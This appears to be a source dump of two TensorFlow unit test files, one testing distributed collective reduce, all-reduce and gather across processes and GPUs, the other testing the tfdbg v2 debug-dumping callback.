implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [1.0, 2.0]
if group_size == 2:
expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
elif group_size == 4:
expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = ([
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
])
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [
IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
]
if group_size == 2:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
elif group_size == 4:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
indices=[0, 1, 1, 2, 3, 4, 8, 9],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
indices=[1, 2, 0, 1, 3, 4, 3, 4],
dense_shape=[5, 2])
]
self.batch_reduce_and_verify(inputs, expect, options)
def testBatchReduceMixedDenseAndSparse(self):
options = self.RunOptions(
num_processes=2,
gpus_per_process=0,
reduce_op=ReduceOp.SUM,
mode=["func_graph"])
inputs_data = [
[
1.0, 2.0,
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
],
[
3.0, 4.0,
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
],
]
expect = [
4.0, 6.0,
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
self.batch_reduce_and_verify(inputs_data, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceDense(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = constant_op.constant(1.0)
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [1.0 * group_size] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [1.0] * len(devices)
self.assertAllClose(got, expect)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (constant_op.constant(1.0), constant_op.constant(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(1.0, 2.0)] * len(devices)
self.assertAllClose(got, expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = IndexedSlices(
values=array_ops.identity([[1.]]),
indices=array_ops.identity([0]),
dense_shape=array_ops.identity([5, 1]))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
IndexedSlices([[3. * group_size]], [2], [5, 1]))
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(IndexedSlices([[1.]], [0], [5, 1]),
IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=0,
implementation=CommunicationImplementation.AUTO,
reduce_op=ReduceOp.SUM))
def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
implementation, reduce_op):
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])), array_ops.identity(1.0),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])), array_ops.identity(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
expect = [
(IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
axis=[0, 1, 2],
func_mode=["eager", "func_graph"],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
func_mode, axis, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)
def gather_fn():
per_replica_value = make_per_replica_value(value, devices)
gathered_values = collective._gather(
per_replica_value, per_replica_value, axis=axis, options=options)
gathered_values = self.as_list(gathered_values)
# Skip checking devices in eager. In eager the device attribute doesn't
# reflect the actual device of the tensor.
if not context.executing_eagerly():
self.assertAllEqual(devices, [v.device for v in gathered_values])
return [ops.convert_to_tensor(v) for v in gathered_values]
group_size = num_processes * (required_gpus or 1)
expect = array_ops.concat([value] * group_size, axis=axis)
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if func_mode == "eager":
result = gather_fn()
self.assertAllClose(result, per_replica_expect)
if func_mode == "func_graph":
result = def_function.function(gather_fn)()
self.assertAllClose(result, per_replica_expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[CommunicationImplementation.RING]))
def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
implementation):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = make_per_replica_value(constant_op.constant([1.]), devices)
@def_function.function
def reduce_fn():
def cond_body():
reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
options)
return math_ops.add_n(self.as_list(reduced)) / len(devices)
return control_flow_ops.cond(
array_ops.identity(False), cond_body, cond_body)
num_replicas = num_processes * len(devices)
self.assertAllEqual(reduce_fn(), [1. * num_replicas])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes,
required_gpus,
implementation,
prefer_unique_instance_key):
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
# If the kernel launch sequence is as-is the program will deadlock since
# NCCL requires the launch order to be same on each device.
v0 = make_per_replica_value(1.0, devices)
v1 = make_per_replica_value(2.0, devices)
# Add a delay to collective_ops.all_reduce according to the input tensors
# index in `sequence.`
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v0, v0), (v0, v0)], options)
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)],
options)
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testInputsAreFunctionArgs(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
@def_function.function
def reduce_fn(v):
# Function inputs don't have device placement.
self.assertEqual(v.values[0].device, "")
self.assertEqual(v.values[1].device, "")
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v),
(v, v)],
options)
self.assertEqual(reduced[0].values[0].device, devices[0])
self.assertEqual(reduced[0].values[1].device, devices[1])
self.assertEqual(reduced[1].values[0].device, devices[0])
self.assertEqual(reduced[1].values[1].device, devices[1])
# Returning Mirrored only evaluates the primary value, which causes
# hanging,
return [reduced[0].values, reduced[1].values]
v = make_per_replica_value(1.0, devices)
reduced = reduce_fn(v)
self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceDense(self, num_processes, implementation, required_gpus,
prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_dense():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're three workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceDense(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_dense():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceSparse(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_sparse():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceSparse(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
if (num_processes != required_gpus and
implementation == CommunicationImplementation.AUTO):
self.skipTest("Skip potential NCCL combination (AUTO) with mismatched "
"process and GPU count. NCCL requires physical GPUs for "
"every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_sparse():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(combinations.combine(num_processes=1, required_gpus=2))
def testNcclOrdering(self, num_processes, required_gpus):
if num_processes != required_gpus:
self.skipTest("Skip NCCL combination with mismatched process and GPU "
"count. NCCL requires physical GPUs for every process.")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(
implementation=CommunicationImplementation.NCCL)
v_dense = make_per_replica_value([1.0, 1.0], devices)
v_sparse = make_per_replica_value([
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
], devices)
@def_function.function
def nested_dense():
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
@def_function.function
def nested_sparse():
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# All collectives, function calls, if clause and while loops should be
# chained by control dependencies, so that the execution order is
# deterministic.
@def_function.function
def f():
# pylint: disable=pointless-statement
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reducing dense value.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
# reducing sparse value.
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reduce dense value in nested tf.function.
nested_dense()
# reduce sparse value in nested tf.function.
nested_sparse()
# reduce dense value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
else:
v_dense
# reduce sparse value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
v_sparse
else:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
# reduce dense value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
i += 1
# reduce sparse value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
i += 1
# reducing dense and sparse value again.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# pylint: enable=pointless-statement
graph = f.get_concrete_function().graph
should_be_ordered = set([
"CollectiveReduceV2", "CollectiveGatherV2", "If", "While",
"StatefulPartitionedCall"
])
nodes_by_device = {}
for op in graph.get_operations():
if op.type in should_be_ordered:
if op.device not in nodes_by_device:
nodes_by_device[op.device] = []
nodes_by_device[op.device].append(op)
order = test_util.topological_sort_operations(graph.get_operations())
for device in devices:
device = device_util.canonicalize(device)
# Those function ops don't have device annotations, but they contain
# collectives for both devices so we always include them.
operations = nodes_by_device[device] + nodes_by_device[""]
# Verify that we get all types of nodes we want.
self.assertEqual(set(op.type for op in operations), should_be_ordered)
test_util.assert_sequential_execution(order, operations)
get_global_mpr(num_processes).run(replica_fn)
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
# TODO(b/172304955): figure why logical devices doesn't work.
test_util.main(config_logical_devices=False)
|
dumping_callback_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.keras import models
from tensorflow.python.keras.applications import mobilenet_v2
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _create_simple_recurrent_keras_model(input_shape):
"""Create a simple tf.keras model containing a recurrent layer for testing."""
model = models.Sequential()
model.add(recurrent_v2.LSTM(
10,
input_shape=input_shape,
kernel_initializer="zeros",
recurrent_initializer="zeros"))
model.add(core.Dense(1, kernel_initializer="zeros"))
model.compile(loss="mse", optimizer="sgd")
return model
class TracingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(TracingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(TracingCallbackTest, self).tearDown()
def testInvalidTensorDebugModeCausesError(self):
with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
execution_iter = reader.execution_iterator()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
execution = debug_event.execution
executed_op_types.append(execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.tensor_protos)
elif tensor_debug_mode == "CURT_HEALTH":
